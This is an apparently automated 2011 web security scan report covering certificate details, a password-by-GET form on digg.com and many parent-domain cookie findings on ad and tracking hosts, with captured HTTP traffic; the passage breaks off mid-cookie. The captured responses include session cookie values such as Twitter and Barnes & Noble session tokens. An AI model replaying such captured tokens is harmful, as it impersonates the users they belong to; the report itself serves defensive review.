The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	*.gigya.com
Issued by:	Go Daddy Secure Certification Authority
Valid from:	Thu Nov 04 09:50:30 GMT-06:00 2010
Valid to:	Sun Nov 04 09:50:30 GMT-06:00 2012

Certificate chain #1

Issued to:	Go Daddy Secure Certification Authority
Issued by:	Go Daddy Class 2 Certification Authority
Valid from:	Wed Nov 15 19:54:37 GMT-06:00 2006
Valid to:	Sun Nov 15 19:54:37 GMT-06:00 2026

Certificate chain #2

Issued to:	Go Daddy Class 2 Certification Authority
Issued by:	Go Daddy Class 2 Certification Authority
Valid from:	Tue Jun 29 11:06:20 GMT-06:00 2004
Valid to:	Thu Jun 29 11:06:20 GMT-06:00 2034

11.11. https://subscriberservices.mcclatchy.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://subscriberservices.mcclatchy.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	subscriberservices.mcclatchy.com
Issued by:	Entrust Certification Authority - L1C
Valid from:	Tue May 31 11:48:43 GMT-06:00 2011
Valid to:	Thu May 31 13:40:04 GMT-06:00 2012

Certificate chain #1

Issued to:	Entrust Certification Authority - L1C
Issued by:	Entrust.net Certification Authority (2048)
Valid from:	Thu Dec 10 14:43:54 GMT-06:00 2009
Valid to:	Tue Dec 10 15:13:54 GMT-06:00 2019

Certificate chain #2

Issued to:	Entrust.net Certification Authority (2048)
Issued by:	Entrust.net Certification Authority (2048)
Valid from:	Fri Dec 24 11:50:51 GMT-06:00 1999
Valid to:	Tue Jul 24 08:15:12 GMT-06:00 2029

11.12. https://www.linkedin.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.linkedin.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	www.linkedin.com
Issued by:	Thawte SGC CA - G2
Valid from:	Mon Jun 27 18:00:00 GMT-06:00 2011
Valid to:	Thu Jul 05 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:	Thawte SGC CA - G2
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Wed Jul 28 18:00:00 GMT-06:00 2010
Valid to:	Tue Jul 28 17:59:59 GMT-06:00 2020

Certificate chain #2

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Wed Jul 16 17:59:59 GMT-06:00 2036

11.13. https://www.sprint.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.sprint.net
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	www.sprint.net
Issued by:	Entrust Certification Authority - L1B
Valid from:	Mon May 18 12:20:39 GMT-06:00 2009
Valid to:	Tue Jun 05 12:50:38 GMT-06:00 2012

Certificate chain #1

Issued to:	Entrust Certification Authority - L1B
Issued by:	Entrust.net Certification Authority (2048)
Valid from:	Mon Aug 25 12:14:26 GMT-06:00 2008
Valid to:	Sat Aug 25 12:44:26 GMT-06:00 2018

Certificate chain #2

Issued to:	Entrust.net Certification Authority (2048)
Issued by:	Entrust.net Certification Authority (2048)
Valid from:	Fri Dec 24 11:50:51 GMT-06:00 1999
Valid to:	Tue Jul 24 08:15:12 GMT-06:00 2029

12. Password field submitted using GET method previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://digg.com
Path:	/submit

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

http://digg.com/submit

The form contains the following password field:

password

Issue background

The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passwords into the URL increases the risk that they will be captured by an attacker.

Issue remediation

All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.

Request

GET /submit HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13. Cookie scoped to parent domain previous next
There are 95 instances of this issue:

http://api.twitter.com/1/UND_com/lists/notre-dame-football/statuses.json
http://search.barnesandnoble.com/The-Sacramento-Bee/The-McClatchy-Company/e/2940000984826
http://a.tribalfusion.com/j.ad
http://ad.doubleclick.net/jump/N763.no_url_specifiedOX2619/B5770010.3
http://ad.doubleclick.net/jump/N763.usatoday.comOX3622/B5770010.5
http://ad.turn.com/r/cs
http://ad.turn.com/server/pixel.htm
http://ad.yabuka.com/statsin/adframe/803/300x250
http://admeld.adnxs.com/usersync
http://ads.revsci.net/adserver/ako
http://ads.revsci.net/adserver/ako
http://ads.revsci.net/adserver/ako
http://ads.revsci.net/adserver/ako
http://ads.undertone.com/ajs.php
http://ak1.abmr.net/is/ads.undertone.com
http://ak1.abmr.net/is/tag.admeld.com
http://api.bizographics.com/v1/profile.redirect
http://as.casalemedia.com/s
http://b.scorecardresearch.com/b
http://b.scorecardresearch.com/p
http://b.scorecardresearch.com/r
http://bh.contextweb.com/bh/rtset
http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js
http://c7.zedo.com/bar/v16-504/c5/jsc/fmr.js
http://c7.zedo.com/utils/ecSet.js
http://clk.fetchback.com/serve/fb/click
http://cm.npc-mcclatchy.overture.com/js_1_0/
http://cm.npc-mcclatchy.overture.com/partner/js/ypn.js
http://companion.adap.tv/companion/post
http://control.adap.tv/control
http://d.p-td.com/r/du/id/L21rdC80L21waWQvMzU5ODk3MA/mpuid/NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F
http://developers.facebook.com/plugins/
http://feedburner.google.com/fb/a/mailverify
http://i.w55c.net/ping_match.gif
http://ib.adnxs.com/getuid
http://ib.adnxs.com/getuidnb
http://imp.fetchback.com/serve/fb/adtag.js
http://imp.fetchback.com/serve/fb/imp
http://js.revsci.net/gateway/gw.js
http://leadback.advertising.com/adcedge/lb
http://load.exelator.com/load/
http://log.adap.tv/log
http://nmcharlotte.112.2o7.net/b/ss/nmcharlotte/1/H.20.3/s85129847696516
http://odb.outbrain.com/utils/get
http://optimized-by.rubiconproject.com/a/4462/5032/7102-15.js
http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html
http://optimized-by.rubiconproject.com/a/6291/9346/15214-15.js
http://optimized-by.rubiconproject.com/a/6291/9346/15214-2.js
http://p.brilig.com/contact/bct
http://picasaweb.google.com/lh/view
http://pix04.revsci.net/A11149/a4/0/0/123.302
http://pix04.revsci.net/D08734/a1/0/0/0.gif
http://pix04.revsci.net/D08734/a1/0/3/0.js
http://pix04.revsci.net/F09828/a4/0/0/0.js
http://pix04.revsci.net/I07714/b3/0/3/1008211/954068462.js
http://pix04.revsci.net/J06575/a4/0/0/pcx.js
http://pix04.revsci.net/J06575/b3/0/3/1008211/846374105.js
http://pixel.quantserve.com/pixel/p-61YFdB4e9hBRs.gif
http://pixel.rubiconproject.com/tap.php
http://pixel.rubiconproject.com/tap.php
http://pixel.rubiconproject.com/tap.php
http://pixel.rubiconproject.com/tap.php
http://r.openx.net/set
http://r.turn.com/server/pixel.htm
http://rt.legolas-media.com/lgrt
http://segments.adap.tv/data
http://segments.adap.tv/data/
http://sitelife.usatoday.com/ver1.0/Stats/Tracker.gif
http://sitelife.usatoday.com/ver1.0/sys/jsonp.app
http://sitelife.usatoday.com/ver1.0/usat/pluck/comments/comments.js
http://sitelife.usatoday.com/ver1.0/usat/pluck/pluck.js
http://sync.adap.tv/sync
http://sync.mathtag.com/sync/img
http://tacoda.at.atwola.com/rtx/r.js
http://tags.bluekai.com/site/2964
http://tags.bluekai.com/site/38
http://tags.bluekai.com/site/4449
http://tags.bluekai.com/site/450
http://tags.bluekai.com/site/4592
http://tap.rubiconproject.com/oz/feeds/invite-media-rtb/tokens/
http://tu.connect.wunderloop.net/TU/1/1/1/
http://tu.connect.wunderloop.net/TU2/1/1/1/
http://usatoday1.112.2o7.net/b/ss/usatodayprod,gntbcstglobal/1/H.22.1/s88160667486954
http://www.bizographics.com/collect/
http://www.careerbuilder.com/JobPoster/Products/PostJobsInfo.aspx
http://www.careerbuilder.com/JobSeeker/Resumes/PostResumeNew/PostYourResume.aspx
http://www.facebook.com/campaign/landing.php
http://www.facebook.com/home.php
http://www.facebook.com/share.php
http://www.google.com/insights/search/
https://www.linkedin.com/secure/login
http://www.myspace.com/Modules/PostTo/Pages/
http://www.sacbee.com/reg_js/access_check.js
http://www.wtp101.com/pull_sync
http://www.youtube.com/results

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.

13.1. http://api.twitter.com/1/UND_com/lists/notre-dame-football/statuses.json previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://api.twitter.com
Path:	/1/UND_com/lists/notre-dame-football/statuses.json

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

_twitter_sess=BAh7CjoMY3NyZl9pZCIlMDU1ZDIyNWEzNjUyZDNiMzI4ZjY2YjQ1YTFhMjY5%250ANzA6DnJldHVybl90byIcaHR0cDovL3R3aXR0ZXIuY29tL2hvbWU6D2NyZWF0%250AZWRfYXRsKwieE%252BQxMgEiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZs%250AYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA6B2lkIiU3MjY4NTJkZGFhNTM0%250AZTJhODhlNjkxY2EwYmFlZTlkNQ%253D%253D--27f28af8f4e2f6c861614383b06012a62c7dbf03; domain=.twitter.com; path=/; HttpOnly
guest_id=v1%3A131509931699548357; domain=.twitter.com; path=/; expires=Tue, 03 Sep 2013 13:21:56 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /1/UND_com/lists/notre-dame-football/statuses.json HTTP/1.1
Host: api.twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 400 Bad Request
Date: Sun, 04 Sep 2011 01:21:57 GMT
Server: hi
Status: 400 Bad Request
X-RateLimit-Limit: 150
X-RateLimit-Remaining: 0
X-Runtime: 0.00635
Content-Type: application/json; charset=utf-8
Content-Length: 154
X-RateLimit-Class: api
Cache-Control: no-cache, max-age=300
X-RateLimit-Reset: 1315100623
Set-Cookie: guest_id=v1%3A131509931699548357; domain=.twitter.com; path=/; expires=Tue, 03 Sep 2013 13:21:56 GMT
Set-Cookie: _twitter_sess=BAh7CjoMY3NyZl9pZCIlMDU1ZDIyNWEzNjUyZDNiMzI4ZjY2YjQ1YTFhMjY5%250ANzA6DnJldHVybl90byIcaHR0cDovL3R3aXR0ZXIuY29tL2hvbWU6D2NyZWF0%250AZWRfYXRsKwieE%252BQxMgEiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZs%250AYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA6B2lkIiU3MjY4NTJkZGFhNTM0%250AZTJhODhlNjkxY2EwYmFlZTlkNQ%253D%253D--27f28af8f4e2f6c861614383b06012a62c7dbf03; domain=.twitter.com; path=/; HttpOnly
Expires: Sun, 04 Sep 2011 01:26:56 GMT
Vary: Accept-Encoding
Connection: close

{"error":"Rate limit exceeded. Clients may not make more than 150 requests per hour.","request":"\/1\/UND_com\/lists\/notre-dame-football\/statuses.json"}

13.2. http://search.barnesandnoble.com/The-Sacramento-Bee/The-McClatchy-Company/e/2940000984826 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://search.barnesandnoble.com
Path:	/The-Sacramento-Bee/The-McClatchy-Company/e/2940000984826

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

pds%5Fsess=d=AQDHu9rRnD%2fjrm8xcUgxEoj1Ylkl91VD8B%2bNGqKkf2oKsODN%2bAeOfCX4zlRMNjdk3QTJPGq5srW21wstdDzZfL2wxAnpys7HVCWpD97KNbjNRaKzSOJKXov3Z%2fvO1s3OLEc%3d&v=5; domain=.barnesandnoble.com; path=/
pds%5Fvcart%5Fsess=d=dof%2fQCAAIDJzmP6bP5jsrwnis1h3Kt8OO9Ec3ZRg76Y4McQBYQAEAAIAaQAAAAQA&v=5; domain=.barnesandnoble.com; path=/
pds%5Fprof%5Flife=d=%2f0%2fSNRQANJZKOAJECq4fuATs16FghsQBYQAIAAoAewAAAHwAAgAAAAAAAAAAAAAA&v=5; domain=.barnesandnoble.com; expires=Fri, 02-Sep-2016 01:23:43 GMT; path=/
pds%5Flife=d=AQAw9qTVv8oLrLVmei2ledNrPyUXm7x5jgqi12MjRitKAKjnGigKHspVh2gOF1gyvghtGR%2ffErW1kHRLKuMKmS6B&v=5; domain=.barnesandnoble.com; expires=Fri, 02-Sep-2016 01:23:43 GMT; path=/

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /The-Sacramento-Bee/The-McClatchy-Company/e/2940000984826 HTTP/1.1
Host: search.barnesandnoble.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.3. http://a.tribalfusion.com/j.ad previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/j.ad

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ANON_ID=aTnsXDNj6WqoyhURALhZcBrHwBvZaUWbjSqX2DmFYQP3yOAgnNKGLlr9eglkIxJOkrcm2VawOaWiZbjMoBQ; path=/; domain=.tribalfusion.com; expires=Sat, 03-Dec-2011 01:01:39 GMT;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /j.ad?site=admeldae&adSpace=audienceselect&size=1x1&admeld_user_id=14c82149-9fc3-4277-af4b-df6e89b3fc47&admeld_dataprovider_id=10&admeld_callback=http://tag.admeld.com/pixel HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 101
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Set-Cookie: ANON_ID=aTnsXDNj6WqoyhURALhZcBrHwBvZaUWbjSqX2DmFYQP3yOAgnNKGLlr9eglkIxJOkrcm2VawOaWiZbjMoBQ; path=/; domain=.tribalfusion.com; expires=Sat, 03-Dec-2011 01:01:39 GMT;
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 368
Expires: 0
Connection: keep-alive

document.write('<center><a target=_blank href="http://a.tribalfusion.com/h.click/aSmMvf4drZdSsZbF4P3HpHaqTHfh0rQjYUF90qEpSrrHWUY0THUWmFQmRUFs1q3s4TFc2q7XnTFGXFZbfUWMRoAMBnGYvpWfE5TQ73dem3A7KnF3ZdXsfRY
...[SNIP]...

13.4. http://ad.doubleclick.net/jump/N763.no_url_specifiedOX2619/B5770010.3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/jump/N763.no_url_specifiedOX2619/B5770010.3

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

id=229b025847010047|1181183/541316/15221|t=1314754416|et=730|cs=002213fd48ab1c4d1bf867f0d1; path=/; domain=.doubleclick.net; expires=Fri, 30 Aug 2013 01:33:36 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jump/N763.no_url_specifiedOX2619/B5770010.3 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://espn.go.com/college-football/team/_/id/99/lsu-tigers?ex_cid=2011_bnnr_CFB_xxxx_awrs
Set-Cookie: id=229b025847010047|1181183/541316/15221|t=1314754416|et=730|cs=002213fd48ab1c4d1bf867f0d1; path=/; domain=.doubleclick.net; expires=Fri, 30 Aug 2013 01:33:36 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Sun, 04 Sep 2011 01:21:32 GMT
Server: GFE/2.0
Content-Type: text/html
Connection: close

13.5. http://ad.doubleclick.net/jump/N763.usatoday.comOX3622/B5770010.5 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/jump/N763.usatoday.comOX3622/B5770010.5

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

id=229b025847010047|1181183/552924/15221|t=1314754416|et=730|cs=002213fd48ab1c4d1bf867f0d1; path=/; domain=.doubleclick.net; expires=Fri, 30 Aug 2013 01:33:36 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jump/N763.usatoday.comOX3622/B5770010.5 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://espn.go.com/college-football/team/_/id/99/lsu-tigers?ex_cid=2011_bnnr_CFB_xxxx_awrs
Set-Cookie: id=229b025847010047|1181183/552924/15221|t=1314754416|et=730|cs=002213fd48ab1c4d1bf867f0d1; path=/; domain=.doubleclick.net; expires=Fri, 30 Aug 2013 01:33:36 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Sun, 04 Sep 2011 01:21:29 GMT
Server: GFE/2.0
Content-Type: text/html
Connection: close

13.6. http://ad.turn.com/r/cs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.turn.com
Path:	/r/cs

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

uid=8932325985038971405; Domain=.turn.com; Expires=Fri, 02-Mar-2012 01:14:01 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/cs?pid=18 HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=2925993182975414771; rrs=undefined%7Cundefined%7Cundefined%7C4%7Cundefined%7C6; rds=undefined%7Cundefined%7Cundefined%7C15221%7Cundefined%7C15221; rv=1

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=8932325985038971405; Domain=.turn.com; Expires=Fri, 02-Mar-2012 01:14:01 GMT; Path=/
Location: http://sync.adap.tv/sync?type=gif&key=turn&uid=8932325985038971405
Content-Length: 0
Date: Sun, 04 Sep 2011 01:14:00 GMT

13.7. http://ad.turn.com/server/pixel.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.turn.com
Path:	/server/pixel.htm

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

uid=2925993182975414771; Domain=.turn.com; Expires=Fri, 02-Mar-2012 01:05:49 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /server/pixel.htm?fpid=6&sp=y HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=6291/9346
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=2925993182975414771

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2925993182975414771; Domain=.turn.com; Expires=Fri, 02-Mar-2012 01:05:49 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 01:05:49 GMT
Content-Length: 342

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
src="http://cdn.turn.com/server/ddc.htm?uid=2925993182975414771&rnd=4338981458170383181&fpid=6&nu=n&t=
...[SNIP]...

13.8. http://ad.yabuka.com/statsin/adframe/803/300x250 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.yabuka.com
Path:	/statsin/adframe/803/300x250

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

tc="cDF77OkBNtpIeBFOSP/PqGtaKOk=?_expires=STEzMTU1MTEwODAKLg==&client_id=UydsYUZwRDMxV2syJwpwMQou"; Domain=.yabuka.com; expires=Thu, 08-Sep-2011 19:44:40 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /statsin/adframe/803/300x250 HTTP/1.1
Host: ad.yabuka.com
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Sun, 04 Sep 2011 00:44:40 GMT
Content-Type: text/javascript; charset=utf-8
Connection: keep-alive
Set-Cookie: client_id=laFpD31Wk2; Path=/
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: tc="cDF77OkBNtpIeBFOSP/PqGtaKOk=?_expires=STEzMTU1MTEwODAKLg==&client_id=UydsYUZwRDMxV2syJwpwMQou"; Domain=.yabuka.com; expires=Thu, 08-Sep-2011 19:44:40 GMT; Path=/
Content-Length: 2211

(function(c){var d=typeof ybk_url_prefix=="undefined"?"":ybk_url_prefix,e=typeof ybk_url_suffix=="undefined"?"":"/"+ybk_url_suffix;document.write('<style type="text/css">.yabuka_300x250{width:298px;he
...[SNIP]...

13.9. http://admeld.adnxs.com/usersync previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://admeld.adnxs.com
Path:	/usersync

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

uuid2=6422714091563403120; path=/; expires=Sat, 03-Dec-2011 01:01:36 GMT; domain=.adnxs.com; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /usersync?calltype=admeld&admeld_user_id=14c82149-9fc3-4277-af4b-df6e89b3fc47&admeld_adprovider_id=193&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIrIsBEAoYASABKAEwwfGD8wQQwfGD8wQYAA..; sess=1; uuid2=6422714091563403120; anj=Kfu=8fG49EE:3F.0s]#%2L_'x%SEV/hnLCF!z6Ut0QkM9e5'Qr*vP.V*lpYBPp[Bs3dBED7@8!MMT@<SGb]bp@OWFe]M3^!WeuSpp!<tk0xzCgSDb'W7Qc:sp!-ewEI]-`k1+UxXE$1ICe*b^.=BJe(Od$<_TyZV2FP?n>[#!9X=V13(0V-n(2[>dH7.).LuM^sXd=GCF-/bO1P3I*!2a3C06.$K

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 05-Sep-2011 01:01:36 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=6422714091563403120; path=/; expires=Sat, 03-Dec-2011 01:01:36 GMT; domain=.adnxs.com; HttpOnly
Content-Type: application/x-javascript
Date: Sun, 04 Sep 2011 01:01:36 GMT
Content-Length: 155

document.write('<img src="http://tag.admeld.com/match?admeld_adprovider_id=193&external_user_id=6422714091563403120&expiration=0" width="0" height="0"/>');

13.10. http://ads.revsci.net/adserver/ako previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.revsci.net
Path:	/adserver/ako

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsiPus_UF3V="MLtXrlEusS9roBD3ElioJsiF6sySUVfem3F3zgv5P+XsmyQaJ+0k7MGOSKJRnNlEyGtzHzk5mDju5hlW5NwWJNSy3FWGQChLCmu5FMT9Fpo1Qcv041wsRTflypSLkJ9eQVhctxoj+x1apTdBCWH42nprnPYbIoWxazGLrb/KD+A5h23Q0hhqnxgFbPS1+lDgrNtLaBhIM2vP3nBqmfmrq1mj+YZOVMIzdjtBBdiMduSHmogIVaKDrQjT5pWjfsXtP6NGQRew48EHjwAjj9+t2ahbA5RGrgTOQjNT/WZbiGxd3KiLH2//jU2CDyuU"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
rsi_us_1000000="pUMdJT+nPwIU1E3iQFs1r+MwYFC/diQV0kvz1kXs5mm0b3NdNCaOJe4OMJnDsXCU/hoHR2Abd2814IP+LIsrai4Yeh5Y0b3GwI4FFOSN1pRQxzRy73LRLfWWczJlclKL0YNSVo4OI3RgHMG1353gA+Hdp4ovXbfdxfWv1Ykr1+sCStqlQSeDxIQQumHRevQ4SeMBODBch2StTKbY2p5nlakA9re0+3BYs0u9gWSSwIbIJkxcG5ogg5E3tctFd4ReQGR8KRyvC2x+KBCDqcekX89iIvSozn8HiXJFmHHE8NEO4/G/KdZ4ff0JA8T4Ns7xfEx3pY/7Wt2Ka+vWmG33A2ZKoTSIISDcv+LD6tT4NDiXv9Q9BNVPgnMb8XATn5qdr8B0D/F1FCSeVU43iTFd1mC4TuTJftcD/tLlKJ4jmc6hI5Npr9OrUSP52wZe2wowk5xduhRsMYjWHa8sZNT/dZFkt88Ur9WOL+BtORTARMAsRYu07WlIbycCqF6vvDaGzoV7mmDYvyM36GYYVHm7vA97cCzmm6IVzvvI7ycJ+epIsWZ6d06Ef1Aw0GEEJMdoGTSmI/l3n7FBpb6t6wCom+EmxAZUpePMxG7dr1Ub81+ViLpEMDWKnZs6O0QPFj/3MNG2ZbiCMMzG4XfB9FLf6spCLQI7T1XUr0XWWETCpu86hDI21eINnnsXn6SeFYsT9eVs0XJgaxEUuIf0mSjMrOz9mHfpLVpxt/RS/SeaCsdix7dv7hRcKjm3ARs9Qyb5nQsCmKf9dBR800OsZgIsYGSF5Ust4vDhmMds4TifQL15E+hDyvfMEO+XuMXKnVam3C/mFzIhO9jPkTqcROZyhbhYldHgHUGcds48vJS469Z0JxkwGELcG35QWwIalJEG"; Version=1; 